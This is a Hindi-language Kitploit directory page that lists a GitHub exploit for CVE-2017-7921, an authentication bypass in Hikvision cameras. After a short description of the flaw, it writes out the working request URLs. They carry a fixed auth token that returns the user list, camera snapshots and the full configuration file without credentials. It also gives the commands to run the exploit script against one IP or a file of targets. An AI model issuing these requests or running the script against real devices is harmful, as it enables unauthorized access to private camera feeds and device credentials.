Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/jrdw0/cve-2017-7921-exp
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjrdw0/cve-2017-7921-exp

CVE-2017-7921-EXP

हिकविजन कैमरा CVE-2017-7921-EXP

रिपॉजिटरी देखें
1012026 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-7921 शोषण

Hikvision उपकरणों में एक अनुचित प्रमाणीकरण समस्या पाई गई।

​ अनुचित प्रमाणीकरण भेद्यता तब होती है जब कोई एप्लिकेशन उपयोगकर्ताओं को पर्याप्त या सही रूप से प्रमाणित नहीं करता है।

​ इससे एक दुर्भावनापूर्ण उपयोगकर्ता सिस्टम पर अपने विशेषाधिकारों को बढ़ा सकता है और संवेदनशील जानकारी तक पहुंच प्राप्त कर सकता है।

​ https://seclists.org/fulldisclosure/2017/Sep/23

​ भेद्यता विवरण:

​ ----------------------

​ सभी उपयोगकर्ताओं और उनकी भूमिकाओं की सूची प्राप्त करें:

​ http://camera.ip/Security/users?auth=YWRtaW46MTEK

​ प्रमाणीकरण के बिना कैमरा स्नैपशॉट प्राप्त करें:

​ http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​ और सबसे बुरी बात, कोई भी कैमरा कॉन्फ़िगरेशन डाउनलोड कर सकता है:

​ http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

निर्भरता स्थापित करें

root@kitploit:~
python3 -m pip install -r requirements.txt

उपयोग

root@kitploit:~
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run

स्क्रीनशॉट

टूल डाउनलोड करें